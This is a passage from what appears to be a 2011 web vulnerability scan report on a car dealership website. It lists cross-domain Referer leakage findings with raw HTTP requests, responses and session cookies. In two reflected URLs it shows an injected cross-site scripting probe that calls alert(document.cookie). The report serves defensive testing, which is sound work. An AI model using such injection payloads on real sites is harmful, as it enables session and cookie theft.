               this.src = 'http://static.dealer.com/v8/global/images/shim.gif?1178603218000'):(this.origBg = this.origBg? this.origBg :this.currentStyle.backgroundImage.toString().replace('url("','').replace('")',''),
               this.runtimeStyle.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='" + this.origBg + "', sizingMethod='crop')",
               this.runtimeStyle.backgroundImage = "none")),this.pngSet=true));
       }
   /*]]>*/
   </style>
<![endif]-->
           
   
               <h1 id="hDealerName" class="fn org"><span>Mercedes Benz</span></h1>

<address id="hContactInfo" class="adr">
       <span class="address1 street
...[SNIP]...

Request 2

GET /index.htm HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:02:48 GMT
Connection: close
Set-Cookie: ssoid=5f43c46d0a0a002f005f07e830483858;path=/
Set-Cookie: JSESSIONID=37iin56cq34kb;path=/
Set-Cookie: ddcpoolid=CmsPoolO;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 86621

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=&amp;20=www.theautomastermercedesbenz.com&amp;21=/index.htm&amp;50=5f43c46d0a0a002f005f07e830483858&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=10&amp;63-0=INDEX" alt="tracking image" style="position:absolute;visibility:hidden;" /></div>
   </noscript>

<!--[if IE 6]>
   <script type="text/javascript" src="http://static.dealer.com/v8/global/js/tools/no-flicker.pack.js?1243439681000"></script>
   <div id="fixedWrap">
<![endif]-->

<div id="misc1"></div>


<div id="cWrap1"><div id="cWrap2">
<div id="container" class="t1">
<div id="hWrap1">
<div id="hWrap2">
<div id="header">

<div id="hMovieWrap" class="vcard">
           <div id="fLogoWrap">
           <ul id="fLogo">
                                           <li>
                   <img src="http://static.dealer.com/v8/global/images/franchise/black/logo-mercedes-med.png?1294690861000" alt="mercedes" />
               </li>
                   </ul>
   </div>


<!--[if IE 6]>
   <style type="text/css">
   /*<![CDATA[*/
       * html #fLogoWrap img{
           position:relative;
           behavior: expression((this.runtimeStyle.behavior="none")&&(this.pngSet?this.pngSet=true:(this.nodeName == "IMG" && this.src.toLowerCase().indexOf('.png')>-1?(this.runtimeStyle.backgroundImage = "none",
               this.runtimeStyle.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='" + this.src + "', sizingMethod='image')",
               this.src = 'http://static.dealer.com/v8/global/images/shim.gif?1178603218000'):(this.origBg = this.origBg? this.origBg :this.currentStyle.backgroundImage.toString().replace('url("','').replace('")',''),
               this.runtimeStyle.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='" + this.origBg + "', sizingMethod='crop')",
               this.runtimeStyle.backgroundImage = "none")),this.pngSet=true));
       }
   /*]]>*/
   </style>
<![endif]-->
           
   
               <h1 id="hDealerName" class="fn org"><span>Mercedes Benz</span></h1>

<address id="hContactInfo" class="adr">
       <span class="address1 street-address">3328 Shelburne Rd</span>
...[SNIP]...

4. Cross-domain Referer leakage  previous  next
There are 4 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


4.1. http://www.theautomastermercedesbenz.com/certified-inventory/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /certified-inventory/index.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /certified-inventory/index.htm?reset=InventoryListing HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973629.2; __utmc=124194511; __utmb=124194511.3.8.1302976680881

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:57:45 GMT
Connection: close
Cache-Control: no-store
Content-Length: 38294

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Certified preowned vehicles: buy a used car, truck, SUV, automobile</title>
   <meta http-e
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="chrome=1"/>
           

   <link rel="shortcut icon" type="image/vnd.microsoft.icon" href="http://static.dealer.com/v8/global/images/site-favicon-default.ico?1190664535000" />
           
   <script type="text/javascript" src="http://static.dealer.com/v8/global/js/ddc-common.js?1296844757000"></script>
   
   <!--
cssStack.size: 10
maxStackSize allowed: 27 (DynamicNum)
-->
       
   <link rel="stylesheet" type="text/css" media="all" href="http://static.dealer.com/v8/global/css/fonts-grids-reset.css?1272470781000" />

                               
   <link rel="stylesheet" type="text/css" media="screen,projection" href="http://static.dealer.com/v8/global/js/thickbox/css/thickbox-3.1-mod.css?1233160373000" />
                                                   
   <link rel="stylesheet" type="text/css" media="screen,projection" href="http://static.dealer.com/v8/widgets/automotive/inventory/listings/v4/css/listings-style1.css?1302790741000" />
                                                   
   <link rel="stylesheet" type="text/css" media="screen,projection" href="http://static.dealer.com/v8/widgets/automotive/inventory/listings/v4/css/listings-style2.css?1299685233000" />
                                                   
   <link rel="stylesheet" type="text/css" media="print" href="http://static.dealer.com/v8/widgets/automotive/inventory/listings/v4/css/listings-print-style1.css?1228494474000" />
                                                   
   <link rel="stylesheet" type="text/css" media="screen,projection" href="http://static.dealer.com/v8/widgets/automotive/inventory/carflix2/css/carflix2-base.css?1274989064000" />
                                                   
   <link rel="stylesheet" type="text/css" media="screen,projection" href="http://static.dealer.com/v8/global/components/navigations/css/sitenav-style1.css?1270224038000" />
                                                   
   <link rel="stylesheet" type="text/css" media="screen,projection" href="http://static.dealer.com/v8/global/components/footers/css/footer-style2.css?1168468901000" />
                                                   
   <link rel="stylesheet" type="text/css" media="screen,projection" href="http://static.dealer.com/v8/templates/177/css/template.css?1300374587000" />
                                                   
   <link rel="stylesheet" type="text/css" media="screen,projection" href="http://static.dealer.com/v8/templates/177/css/gray_black.css?1301683359000" />
                                                   
   <link rel="stylesheet" type="text/css" media="print" href="http://static.dealer.com/v8/templates/177/css/print.css?1247679150000" />
                       

                               </head>
...[SNIP]...
<div style="position:absolute;visibility:hidden;"><img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=5fa27'-alert(document.cookie)-'bad3f5b4489&amp;20=www.theautomastermercedesbenz.com&amp;21=/certified-inventory/index.htm&amp;50=5f47f9aa0a0a002f005f07e845da2017&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=10&amp;63-0=CERTIFIED_USED_INVENTORY" alt="tracking image" style="position:absolute;visibility:hidden;" /></div>
...[SNIP]...
<li>
                   <img src="http://static.dealer.com/v8/global/images/franchise/black/logo-mercedes-med.png?1294690861000" alt="mercedes" />
               </li>
...[SNIP]...
<li class="last"><a href="http://www.theautomaster.com/index.htm" rel="external"><span>
...[SNIP]...
<li class="last"><a href="http://www.theautomasterspa.com/" rel="external"><span>
...[SNIP]...
</script>


<script type="text/javascript" src="http://static.dealer.com/v8/widgets/automotive/inventory/listings/v4/js/listings.pack.js?1289418376000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/global/js/thickbox/thickbox-3.1-mod.pack.js?1253129070000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/global/js/json2.js?1215466905000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/global/js/jquery/jquery.cookie.js?1211942223000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/global/js/jquery/jquery.eventdelegation.js?1213232061000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/global/js/jquery/jquery.ondemand.pack.js?1266538091000"></script>


<script type="text/javascript" src="http://static.dealer.com/v8/global/js/misc/google-analytics.pack.js?1273851376000"></script>
...[SNIP]...

4.2. http://www.theautomastermercedesbenz.com/linkout/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /linkout/index.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /linkout/index.htm?url=http://www.dealer.com HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973377.1; __utmc=124194511; __utmb=124194511.26.9.1302973849681

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:10:33 GMT
Connection: close
Content-Length: 18048

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="chrome=1"/>
           

   <link rel="shortcut icon" type="image/vnd.microsoft.icon" href="http://static.dealer.com/v8/global/images/site-favicon-default.ico?1190664535000" />
           
   <script type="text/javascript" src="http://static.dealer.com/v8/global/js/ddc-common.js?1296844757000"></script>
   
   <!--
cssStack.size: 7
maxStackSize allowed: 27 (DynamicNum)
-->
       
   <link rel="stylesheet" type="text/css" media="all" href="http://static.dealer.com/v8/global/css/fonts-grids-reset.css?1272470781000" />

                               
   <link rel="stylesheet" type="text/css" media="all" href="http://static.dealer.com/v8/widgets/generic/contact/css/contact-info-style1.css?1190063217000" />
                                                   
   <link rel="stylesheet" type="text/css" media="screen,projection" href="http://static.dealer.com/v8/widgets/generic/hours/css/hours-style1.css?1240347618000" />
                                                   
   <link rel="stylesheet" type="text/css" media="screen,projection" href="http://static.dealer.com/v8/global/components/navigations/css/sitenav-style1.css?1270224038000" />
                                                   
   <link rel="stylesheet" type="text/css" media="screen,projection" href="http://static.dealer.com/v8/global/components/footers/css/footer-style2.css?1168468901000" />
                                                   
   <link rel="stylesheet" type="text/css" media="screen,projection" href="http://static.dealer.com/v8/templates/177/css/template.css?1300374587000" />
                                                   
   <link rel="stylesheet" type="text/css" media="screen,projection" href="http://static.dealer.com/v8/templates/177/css/gray_black.css?1301683359000" />
                                                   
   <link rel="stylesheet" type="text/css" media="print" href="http://static.dealer.com/v8/templates/177/css/print.css?1247679150000" />
                       

                               </head>
...[SNIP]...
<div style="position:absolute;visibility:hidden;"><img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=5fa27'-alert(document.cookie)-'bad3f5b4489&amp;20=www.theautomastermercedesbenz.com&amp;21=/linkout/index.htm&amp;50=5f47f9aa0a0a002f005f07e845da2017&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=10&amp;63-0=LINK_OUT" alt="tracking image" style="position:absolute;visibility:hidden;" /></div>
...[SNIP]...
<li>
                   <img src="http://static.dealer.com/v8/global/images/franchise/black/logo-mercedes-med.png?1294690861000" alt="mercedes" />
               </li>
...[SNIP]...
<li class="last"><a href="http://www.theautomaster.com/index.htm" rel="external"><span>
...[SNIP]...
<li class="last"><a href="http://www.theautomasterspa.com/" rel="external"><span>
...[SNIP]...
</script>


<script type="text/javascript" src="http://static.dealer.com/v8/global/js/misc/google-analytics.pack.js?1273851376000"></script>
...[SNIP]...

4.3. http://www.theautomastermercedesbenz.com/new-inventory/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /new-inventory/index.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /new-inventory/index.htm?reset=InventoryListing HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/financing/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=5f439ee10a0a002f005f07e8e85727f2; JSESSIONID=cywj1cs5gwvm; ddcpoolid=CmsPoolO; __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; __utma=124194511.1620789493.1302973377.1302973377.1302973377.1; __utmc=124194511; __utmb=124194511.10.3.1302973397616

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:03:03 GMT
Connection: close
Cache-Control: no-store
Content-Length: 119393

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes dealer Mercedes Benz located in Shelburne VT</title>
   <meta http-equiv="Content-
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="chrome=1"/>
           

   <link rel="shortcut icon" type="image/vnd.microsoft.icon" href="http://static.dealer.com/v8/global/images/site-favicon-default.ico?1190664535000" />
           
   <script type="text/javascript" src="http://static.dealer.com/v8/global/js/ddc-common.js?1296844757000"></script>
   
   <!--
cssStack.size: 10
maxStackSize allowed: 27 (DynamicNum)
-->
       
   <link rel="stylesheet" type="text/css" media="all" href="http://static.dealer.com/v8/global/css/fonts-grids-reset.css?1272470781000" />

                               
   <link rel="stylesheet" type="text/css" media="screen,projection" href="http://static.dealer.com/v8/global/js/thickbox/css/thickbox-3.1-mod.css?1233160373000" />
                                                   
   <link rel="stylesheet" type="text/css" media="screen,projection" href="http://static.dealer.com/v8/widgets/automotive/inventory/listings/v4/css/listings-style1.css?1302790741000" />
                                                   
   <link rel="stylesheet" type="text/css" media="screen,projection" href="http://static.dealer.com/v8/widgets/automotive/inventory/listings/v4/css/listings-style2.css?1299685233000" />
                                                   
   <link rel="stylesheet" type="text/css" media="print" href="http://static.dealer.com/v8/widgets/automotive/inventory/listings/v4/css/listings-print-style1.css?1228494474000" />
                                                   
   <link rel="stylesheet" type="text/css" media="screen,projection" href="http://static.dealer.com/v8/widgets/automotive/inventory/carflix2/css/carflix2-base.css?1274989064000" />
                                                   
   <link rel="stylesheet" type="text/css" media="screen,projection" href="http://static.dealer.com/v8/global/components/navigations/css/sitenav-style1.css?1270224038000" />
                                                   
   <link rel="stylesheet" type="text/css" media="screen,projection" href="http://static.dealer.com/v8/global/components/footers/css/footer-style2.css?1168468901000" />
                                                   
   <link rel="stylesheet" type="text/css" media="screen,projection" href="http://static.dealer.com/v8/templates/177/css/template.css?1300374587000" />
                                                   
   <link rel="stylesheet" type="text/css" media="screen,projection" href="http://static.dealer.com/v8/templates/177/css/gray_black.css?1301683359000" />
                                                   
   <link rel="stylesheet" type="text/css" media="print" href="http://static.dealer.com/v8/templates/177/css/print.css?1247679150000" />
                       

                               </head>
...[SNIP]...
<div style="position:absolute;visibility:hidden;"><img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://theautomaster.com/index.htm&amp;20=www.theautomastermercedesbenz.com&amp;21=/new-inventory/index.htm&amp;50=5f439ee10a0a002f005f07e8e85727f2&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=10&amp;63-0=NEW_INVENTORY" alt="tracking image" style="position:absolute;visibility:hidden;" /></div>
...[SNIP]...
<li>
                   <img src="http://static.dealer.com/v8/global/images/franchise/black/logo-mercedes-med.png?1294690861000" alt="mercedes" />
               </li>
...[SNIP]...
<li class="last"><a href="http://www.theautomaster.com/index.htm" rel="external"><span>
...[SNIP]...
<li class="last"><a href="http://www.theautomasterspa.com/" rel="external"><span>
...[SNIP]...
<a internallink="true" target="_self" title="undefined" href="/bbo.htm"><img src="http://pictures.dealer.com/a/automastermercedesbenz/1167/855d393240463872017414c83dbef6e5.gif" href="http://pictures.dealer.com/a/automastermercedesbenz/1167/855d393240463872017414c83dbef6e5.gif" title="230bb_Teal.gif" class="wysiwyg-image" tabindex="30000" style="height: 35px; width: 183px;"></a>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6940/6940_cc0320_001_755.jpg" alt="2011 Mercedes-Benz C-Class Sedan" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6940/6940_cc0320_001_040.jpg" alt="2011 Mercedes-Benz C-Class Sedan" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6940/6940_cc0320_001_040.jpg" alt="2011 Mercedes-Benz C-Class Sedan" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6940/6940_cc0320_001_040.jpg" alt="2011 Mercedes-Benz C-Class Sedan" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6940/6940_cc0320_001_792.jpg" alt="2011 Mercedes-Benz C-Class Sedan" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6940/6940_cc0320_001_755.jpg" alt="2011 Mercedes-Benz C-Class Sedan" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6940/6940_cc0320_001_775.jpg" alt="2011 Mercedes-Benz C-Class Sedan" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6940/6940_cc0320_001_359.jpg" alt="2011 Mercedes-Benz C-Class Sedan" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6940/6940_cc0320_001_650.jpg" alt="2011 Mercedes-Benz C-Class Sedan" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6940/6940_cc0320_001_197.jpg" alt="2011 Mercedes-Benz C-Class Sedan" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6940/6940_cc0320_001_775.jpg" alt="2011 Mercedes-Benz C-Class Sedan" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6940/6940_cc0320_001_792.jpg" alt="2011 Mercedes-Benz C-Class Sedan" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6940/6940_cc0320_001_775.jpg" alt="2011 Mercedes-Benz C-Class Sedan" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6892/6892_cc0320_001_040.jpg" alt="2011 Mercedes-Benz E-Class Sedan" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6892/6892_cc0320_001_040.jpg" alt="2011 Mercedes-Benz E-Class Sedan" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6803/6803_cc0320_001_040.jpg" alt="2011 Mercedes-Benz E-Class Station Wagon" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6892/6892_cc0320_001_040.jpg" alt="2011 Mercedes-Benz E-Class Sedan" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6892/6892_cc0320_001_755.jpg" alt="2011 Mercedes-Benz E-Class Sedan" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_stills_0320/6803/6803_st0320_089.jpg" alt="2011 Mercedes-Benz E-Class Station Wagon" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6892/6892_cc0320_001_755.jpg" alt="2011 Mercedes-Benz E-Class Sedan" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6892/6892_cc0320_001_040.jpg" alt="2011 Mercedes-Benz E-Class Sedan" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/autodata/us/thumb_stockphoto-color/2011/USC10MBCA91A0/040.jpg" alt="2011 Mercedes-Benz E-Class Sedan" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/7306/7306_cc0320_001_040.jpg" alt="2011 Mercedes-Benz E-Class Sedan" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6893/6893_cc0320_001_775.jpg" alt="2011 Mercedes-Benz GL-Class SUV" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6893/6893_cc0320_001_040.jpg" alt="2011 Mercedes-Benz GL-Class SUV" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6893/6893_cc0320_001_040.jpg" alt="2011 Mercedes-Benz GL-Class SUV" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6893/6893_cc0320_001_650.jpg" alt="2011 Mercedes-Benz GL-Class SUV" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6865/6865_cc0320_001_755.jpg" alt="2011 Mercedes-Benz GLK-Class SUV" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6865/6865_cc0320_001_040.jpg" alt="2011 Mercedes-Benz GLK-Class SUV" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6865/6865_cc0320_001_775.jpg" alt="2011 Mercedes-Benz GLK-Class SUV" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6865/6865_cc0320_001_040.jpg" alt="2011 Mercedes-Benz GLK-Class SUV" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6865/6865_cc0320_001_040.jpg" alt="2011 Mercedes-Benz GLK-Class SUV" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6865/6865_cc0320_001_755.jpg" alt="2011 Mercedes-Benz GLK-Class SUV" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6891/6891_cc0320_001_650.jpg" alt="2011 Mercedes-Benz M-Class SUV" />
                                           </div>
...[SNIP]...
<div class="mediaImg">
                       <img src="http://images.dealer.com/evox/thumb_color_0320_001/6891/6891_cc0320_001_775.jpg" alt="2011 Mercedes-Benz M-Class SUV" />
                                           </div>
...[SNIP]...
</script>


<script type="text/javascript" src="http://static.dealer.com/v8/widgets/automotive/inventory/listings/v4/js/listings.pack.js?1289418376000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/global/js/thickbox/thickbox-3.1-mod.pack.js?1253129070000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/global/js/json2.js?1215466905000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/global/js/jquery/jquery.cookie.js?1211942223000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/global/js/jquery/jquery.eventdelegation.js?1213232061000"></script>

<script type="text/javascript" src="http://static.dealer.com/v8/global/js/jquery/jquery.ondemand.pack.js?1266538091000"></script>


<script type="text/javascript" src="http://static.dealer.com/v8/global/js/misc/google-analytics.pack.js?1273851376000"></script>
...[SNIP]...

4.4. http://www.theautomastermercedesbenz.com/used-inventory/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /used-inventory/index.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /used-inventory/index.htm?reset=InventoryListing HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/dealership/about.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
